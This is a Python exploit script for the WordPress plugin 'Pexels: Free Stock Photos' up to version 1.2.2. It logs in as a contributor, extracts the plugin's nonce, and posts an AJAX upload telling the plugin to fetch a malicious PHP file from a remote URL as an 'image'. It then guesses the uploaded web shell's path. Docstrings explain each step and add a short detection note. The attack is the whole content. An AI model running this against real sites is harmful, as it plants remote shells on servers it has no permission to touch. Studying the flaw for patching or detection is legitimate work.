import requests
import argparse
import re
import datetime

# EXPLOIT BY NXPLOIT - KHALED ALENAZI,

def initiate_session():
    """Create a fresh ``requests.Session``.

    A session is used so the cookies set by the login request are
    carried automatically on every later request in this script.

    Returns:
        A new, unauthenticated ``requests.Session``.
    """
    http_session = requests.Session()
    return http_session

def authenticate(session, url, username, password):
    """Log in to the WordPress site through ``wp-login.php``.

    Posts the supplied credentials (with ``rememberme`` set) and reports
    success by checking the session's cookie jar for a
    ``wordpress_logged_in`` cookie rather than by inspecting the HTTP
    status of the response.

    Args:
        session: ``requests.Session`` that will keep the login cookies.
        url: Base URL of the WordPress site; a path is appended with a
            leading slash, so no trailing slash is expected.
        username: WordPress account name.
        password: Password for that account.

    Returns:
        True if any cookie whose name contains ``wordpress_logged_in``
        is present after the request, else False.
    """
    login_url = f"{url}/wp-login.php"
    # verify=False turns off TLS certificate validation for this request,
    # so the credentials would be sent to any host presenting any certificate.
    # The response object itself is never inspected; only the cookie jar is.
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": "Mozilla/5.0"})
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)

def extract_wpnonce(session, url):
    """Read the plugin's AJAX nonce from its settings page.

    Fetches ``wp-admin/upload.php?page=pexels_fsp_images_settings`` with
    the (logged-in) session and scans the HTML for an inline
    ``wpnonce: '<value>'`` assignment.

    Args:
        session: Session that already holds WordPress login cookies.
        url: Base URL of the WordPress site (no trailing slash).

    Returns:
        The alphanumeric nonce string, or None if the pattern is absent.
    """
    settings_page = f"{url}/wp-admin/upload.php?page=pexels_fsp_images_settings"
    page = session.get(settings_page)
    found = re.search(r"wpnonce: '([a-zA-Z0-9]+)'", page.text)
    if found is None:
        return None
    return found.group(1)

def execute_exploit(session, url, shell_url, wpnonce):
    """Send the plugin's AJAX upload request with ``image_url`` set to ``shell_url``.

    The POST goes to ``wp-admin/admin-ajax.php`` carrying
    ``pexels_fsp_upload=1``, the caller-supplied URL and the nonce taken
    from the settings page; the remaining fields (``image_src_page``,
    ``image_user``, ``q``) are fixed strings, presumably shaped like what
    the plugin's own settings page submits — not verified here. The
    response is returned unchanged for the caller to inspect.

    Args:
        session: Authenticated ``requests.Session`` (see ``authenticate``).
        url: Base URL of the WordPress site (no trailing slash).
        shell_url: URL the plugin is asked to fetch as the "image".
        wpnonce: Nonce value returned by ``extract_wpnonce``.

    Returns:
        The ``requests.Response`` of the admin-ajax.php POST.

    Note (detection): the observable signature of this request is an
    ``admin-ajax.php`` POST whose body contains ``pexels_fsp_upload``
    with an ``image_url`` that does not point at pexels.com; this is only
    visible to logging that captures request bodies, not to a plain
    access log.
    """
    exploit_url = f"{url}/wp-admin/admin-ajax.php"
    payload = {
        "pexels_fsp_upload": "1",
        "image_url": shell_url,
        "image_src_page": "https://www.pexels.com/photo/black-usb-cable-on-white-and-red-box-7723388/",
        "image_user": "Tara Winstead",
        "q": "exploit",
        "wpnonce": wpnonce
    }
    headers = {
        "User-Agent": "Mozilla/5.0",
        # Referer mimics the plugin settings page that would normally
        # originate this AJAX call.
        "Referer": f"{url}/wp-admin/upload.php?page=pexels_fsp_images_settings",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    }
    # Unlike authenticate(), no verify= is passed here, so TLS validation
    # follows the session's default rather than being disabled.
    return session.post(exploit_url, data=payload, headers=headers)

def extract_shell_path(response, url):
    """Guess the public URL of an uploaded file from the AJAX response.

    Takes the first ``<name>.php`` token found in ``response.text`` and
    places it under the WordPress ``wp-content/uploads/YYYY/MM/`` folder
    for the current local year and month — the location is assumed from
    the date, not read back from the server.

    Args:
        response: Object with a ``text`` attribute (the admin-ajax reply).
        url: Base URL of the WordPress site (no trailing slash).

    Returns:
        The assembled URL, or None if no ``.php`` filename appears in the
        response body.
    """
    php_name = re.search(r'([a-zA-Z0-9_]+\.php)', response.text)
    if php_name is None:
        return None
    stamp = datetime.datetime.now()
    upload_dir = f"{url}/wp-content/uploads/{stamp.year}/{stamp.month:02d}"
    return f"{upload_dir}/{php_name.group(1)}"

def main():
    """Command-line driver: log in, fetch the nonce, send the upload request, report.

    Required arguments: ``-u/--url`` (site base URL), ``-un/--username``,
    ``-p/--password`` and ``-shell_url/--shell_url`` (the URL the plugin
    is asked to fetch). Each step prints a ``[*]``/``[-]`` status line and
    the script stops at the first failure.

    Note: ``exit()`` is the interactive-site helper rather than
    ``sys.exit()``; it is only guaranteed to exist when the ``site``
    module is loaded, which is the default for a normal interpreter.
    """
    parser = argparse.ArgumentParser(description="Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload | BY NXPLOIT - KHALED ALENAZI,")
    parser.add_argument("-u", "--url", required=True, help="WordPress site URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    parser.add_argument("-shell_url", "--shell_url", required=True, help="URL of the malicious PHP file")
    args = parser.parse_args()

    session = initiate_session()
    # Success is judged by the presence of a login cookie, not by HTTP status.
    if not authenticate(session, args.url, args.username, args.password):
        print("[-] Failed to log in.")
        exit()
    print("[*] Successfully logged in.")

    wpnonce = extract_wpnonce(session, args.url)
    if not wpnonce:
        print("[-] Failed to extract wpnonce")
        exit()
    print(f"[*] Extracted wpnonce: {wpnonce}")

    response = execute_exploit(session, args.url, args.shell_url, wpnonce)
    # A 200 only means admin-ajax.php answered; whether the plugin actually
    # stored anything is inferred from a ".php" name in the body below.
    if response.status_code == 200:
        print("[*] Malicious file might have been uploaded!")
        # The printed path is computed from the current date, not returned
        # by the server, so it is a best guess.
        shell_path = extract_shell_path(response, args.url)
        if shell_path:
            print(f"[*] Shell uploaded successfully, path: {shell_path}")
        else:
            print("[-] Failed to locate the shell path.")
    else:
        print("[-] Exploit execution failed.")

# Script entry point; all behaviour lives in main() so the module can be
# imported without sending any requests.
if __name__ == "__main__":
    main()